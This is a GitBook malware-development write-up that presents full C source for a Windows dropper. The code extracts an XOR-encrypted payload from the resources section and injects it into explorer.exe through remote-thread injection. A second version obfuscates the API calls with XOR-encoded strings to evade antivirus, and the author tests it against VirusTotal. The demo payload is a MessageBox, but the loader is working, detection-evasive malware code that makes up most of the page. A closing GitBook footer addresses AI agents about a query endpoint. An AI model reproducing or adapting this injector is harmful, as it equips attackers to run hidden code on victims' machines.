> For the complete documentation index, see [llms.txt](https://sayonara.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sayonara.gitbook.io/writeups/malware-developement/essentials/dropper-project.md). # Dropper Project ## Final Project : final project is in my github : * [**https://github.com/ismail-arame/Shellcode-Injection-Dropper-Project.git**](https://github.com/ismail-arame/Shellcode-Injection-Dropper-Project.git) this project will combine all the techniques we have learned so far from encryption and decryption, function call obfuscation, process injection ...etc we will create a **`dropper`** which will decrypt a payload from **`resources`** **`section .rsrc`** and inject it into **`explorer.exe`** process

the payload is a 64bit MessageBox `(64bit because it will be injected in explorer.exe process which is 64bit)` ![](/files/HhozmqA1N0Hy3xDbdoef) ### Final Dropper : * extract payload from .rsrc section * decrypt payload (XOR) * inject payload into explorer.exe process * hide the console window popup when the program is executed * function call obfuscation ## Code : without function call obfuscation : ```c /* Red Team Operator course code template storing payload in .rsrc section author: reenz0h (twitter: @sektor7net) */ #include #include #include #include #include #include "resources.h" void XOR(char * data, size_t data_len, char * key, size_t key_len) { int j; j = 0; for (int i = 0; i < data_len; i++) { if (j == key_len - 1) j = 0; data[i] = data[i] ^ key[j]; j++; } } int FindTarget(const char *procname) { HANDLE hProcSnap; PROCESSENTRY32 pe32; int pid = 0; // Create a snapshot of the system processes hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // Check if the snapshot creation was successful if (INVALID_HANDLE_VALUE == hProcSnap) return 0; pe32.dwSize = sizeof(PROCESSENTRY32); // Get the first process entry in the snapshot if (!Process32First(hProcSnap, &pe32)) { CloseHandle(hProcSnap); return 0; } // Iterate through the processes in the snapshot while (Process32Next(hProcSnap, &pe32)) { // Compare the process name with the provided name (Case-Insensitive) if (lstrcmpiA(procname, pe32.szExeFile) == 0) { // Process name matches, store the process ID pid = pe32.th32ProcessID; break; } } // Close the handle to the snapshot CloseHandle(hProcSnap); // Return the process ID (0 if not found) return pid; } int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) { LPVOID pRemoteCode = NULL; HANDLE hThread = NULL; // Allocate memory in the remote process to store the payload pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ); // Write the payload to the allocated memory in the remote process WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL); // Create a remote thread in the remote process, starting at the address of the allocated memory hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL); if (hThread != NULL) { // Wait for the remote thread to finish executing (500 milliseconds timeout) WaitForSingleObject(hThread, 500); // Close the handle to the remote thread CloseHandle(hThread); // Return 0 to indicate success return 0; } // Return -1 to indicate failure return -1; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { void * exec_mem; BOOL rv; HANDLE th; DWORD oldprotect = 0; HGLOBAL resHandle = NULL; HRSRC res; int pid = 0; HANDLE hProc = NULL; unsigned char * payload; unsigned int payload_len; char key[] = "mysecretkeee"; // Extract payload from resources section res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA); resHandle = LoadResource(NULL, res); payload = (char *) LockResource(resHandle); payload_len = SizeofResource(NULL, res); // Allocate some memory buffer for payload exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // Copy payload to new memory buffer RtlMoveMemory(exec_mem, payload, payload_len); // Decrypt (DeXOR) the payload which exists in the allocated memory exec_mem XOR((char *) exec_mem, payload_len, key, sizeof(key)); // Process Injection starts HERE... // Find the process ID (PID) of the target process (in this case, explorer.exe) pid = FindTarget("explorer.exe"); if (pid) { // Try to open the target process with specific access rights hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD) pid); if (hProc != NULL) { // Call the Inject function to inject the decrypted payload (exec_mem) into the target process Inject(hProc, exec_mem, payload_len); // Close the handle to the target process CloseHandle(hProc); } } return 0; } ``` let's upload it to virus total

## Code : with function call obfuscation we obfuscated 3 functions (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) in the Inject function ```c /* Red Team Operator course code template storing payload in .rsrc section author: reenz0h (twitter: @sektor7net) */ #include #include #include #include #include #include "resources.h" LPVOID (WINAPI * pVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); BOOL (WINAPI * pWriteProcessMemory)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); HANDLE (WINAPI * pCreateRemoteThread)(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); char key[] = "mysecretkeee"; void XOR(char * data, size_t data_len, char * key, size_t key_len) { int j; j = 0; for (int i = 0; i < data_len; i++) { if (j == key_len - 1) j = 0; data[i] = data[i] ^ key[j]; j++; } } int FindTarget(const char *procname) { HANDLE hProcSnap; PROCESSENTRY32 pe32; int pid = 0; // Create a snapshot of the system processes hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // Check if the snapshot creation was successful if (INVALID_HANDLE_VALUE == hProcSnap) return 0; pe32.dwSize = sizeof(PROCESSENTRY32); // Get the first process entry in the snapshot if (!Process32First(hProcSnap, &pe32)) { CloseHandle(hProcSnap); return 0; } // Iterate through the processes in the snapshot while (Process32Next(hProcSnap, &pe32)) { // Compare the process name with the provided name (Case-Insensitive) if (lstrcmpiA(procname, pe32.szExeFile) == 0) { // Process name matches, store the process ID pid = pe32.th32ProcessID; break; } } // Close the handle to the snapshot CloseHandle(hProcSnap); // Return the process ID (0 if not found) return pid; } int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) { LPVOID pRemoteCode = NULL; HANDLE hThread = NULL; char sVirtualAllocEx[] = { 0x3b, 0x10, 0x1, 0x11, 0x16, 0x13, 0x9, 0x35, 0x7, 0x9, 0xa, 0x6, 0x28, 0x1 }; char sWriteProcessMemory[] = { 0x3a, 0xb, 0x1a, 0x11, 0x6, 0x22, 0x17, 0x1b, 0x8, 0x0, 0x16, 0x16, 0x20, 0x1c, 0x1e, 0xa, 0x11, 0xb }; char sCreateRemoteThread[] = { 0x2e, 0xb, 0x16, 0x4, 0x17, 0x17, 0x37, 0x11, 0x6, 0xa, 0x11, 0x0, 0x39, 0x11, 0x1, 0x0, 0x2, 0x16 }; // Decrypt (DeXOR) the strings sVirtualAllocEx, sWriteProcessMemory and sCreateRemoteThread XOR((char *) sVirtualAllocEx, sizeof(sVirtualAllocEx), key, sizeof(key)); XOR((char *) sWriteProcessMemory, sizeof(sWriteProcessMemory), key, sizeof(key)); XOR((char *) sCreateRemoteThread, sizeof(sCreateRemoteThread), key, sizeof(key)); //resolving function addresses dynamically using GetProcAddress and GetModuleHandle pVirtualAllocEx = GetProcAddress(GetModuleHandle("Kernel32.dll"), sVirtualAllocEx); pWriteProcessMemory = GetProcAddress(GetModuleHandle("Kernel32.dll"), sWriteProcessMemory); pCreateRemoteThread = GetProcAddress(GetModuleHandle("Kernel32.dll"), sCreateRemoteThread); // Allocate memory in the remote process to store the payload pRemoteCode = pVirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ); // Write the payload to the allocated memory in the remote process pWriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL); // Create a remote thread in the remote process, starting at the address of the allocated memory hThread = pCreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL); if (hThread != NULL) { // Wait for the remote thread to finish executing (500 milliseconds timeout) WaitForSingleObject(hThread, 500); // Close the handle to the remote thread CloseHandle(hThread); // Return 0 to indicate success return 0; } // Return -1 to indicate failure return -1; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { void * exec_mem; BOOL rv; HANDLE th; DWORD oldprotect = 0; HGLOBAL resHandle = NULL; HRSRC res; int pid = 0; HANDLE hProc = NULL; unsigned char * payload; unsigned int payload_len; // Extract payload from resources section res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA); resHandle = LoadResource(NULL, res); payload = (char *) LockResource(resHandle); payload_len = SizeofResource(NULL, res); // Allocate some memory buffer for payload exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // Copy payload to new memory buffer RtlMoveMemory(exec_mem, payload, payload_len); // Decrypt (DeXOR) the payload which exists in the allocated memory exec_mem XOR((char *) exec_mem, payload_len, key, sizeof(key)); // Process Injection starts HERE... // Find the process ID (PID) of the target process (in this case, explorer.exe) pid = FindTarget("explorer.exe"); if (pid) { // Try to open the target process with specific access rights hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD) pid); if (hProc != NULL) { // Call the Inject function to inject the decrypted payload (exec_mem) into the target process Inject(hProc, exec_mem, payload_len); // Close the handle to the target process CloseHandle(hProc); } } return 0; } ``` let's upload it to virus total :

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://sayonara.gitbook.io/writeups/malware-developement/essentials/dropper-project.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.